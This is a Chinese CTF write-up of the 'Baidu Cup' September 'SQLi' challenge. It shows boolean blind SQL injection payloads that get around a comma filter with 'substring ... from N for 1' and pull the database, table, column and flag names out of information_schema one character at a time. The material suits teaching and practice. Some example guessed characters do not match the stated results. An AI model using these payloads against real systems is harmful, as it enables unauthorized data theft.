本文主要是介绍“百度杯”CTF比赛 九月场 SQLi 解题思路,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
题目简介
题目名称:SQLi
题目内容:后台有获取flag的线索
解题思路
- 打开地址使用burp抓包发现“l0gin.php?id=1”。
- 打开“l0gin.php?id=1”地址
使用1’ and ‘1’=‘1(成功)和1’ and ‘1’='2(不成功),说明此处存在sql注入。测试中发现后台过滤了逗号,在这里使用from for代替逗号。
开始注入
-
猜测数据库名称
猜测数据库名称的长度。代码:id=1' and (select length(database()))='4。
爆破数据库名称,按位猜测每一位的字符。代码:substring((select database()) from 1 for 1)='q。
这一步得出数据的名称“sqli”。 -
猜测表名称
猜测表名的长度。代码:(select length(group_concat(table_name)) from information_schema.tables where table_schema='sqli')='5。
爆破表名,按位猜测每一位的字符。代码:substring((select group_concat(table_name) from information_schema.tables where table_schema='sqli') from 1 for 1)='f。
这一步得出表的名称“users”。 -
猜测列名称
猜测列名测长度。代码:
(select length(group_concat(column_name)) from information_schema.columns where table_name='users')='29。
爆破列名,按位猜测每一位的字符。代码:substring((select group_concat(column_name) from information_schema.columns where table_name='users') from 1 for 1)='f。
这一步得出列名“flag_9c861b688330”。 -
猜测值
猜测值得长度。代码:
(select length(group_concat(flag_9c861b688330)) from users)='47。
爆破值,按位猜测每一位的字符。代码:substring((select group_concat(flag_9c861b688330) from users) from 1 for 1)='1。
这一步得出列中的值。
这篇关于“百度杯”CTF比赛 九月场 SQLi 解题思路的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
![[SWPUCTF 2021 新生赛]web方向(一到六题) 解题思路,实操解析,解题软件使用,解题方法教程](https://i-blog.csdnimg.cn/direct/bcfaab8e5a68426b8abfa71b5124a20d.png)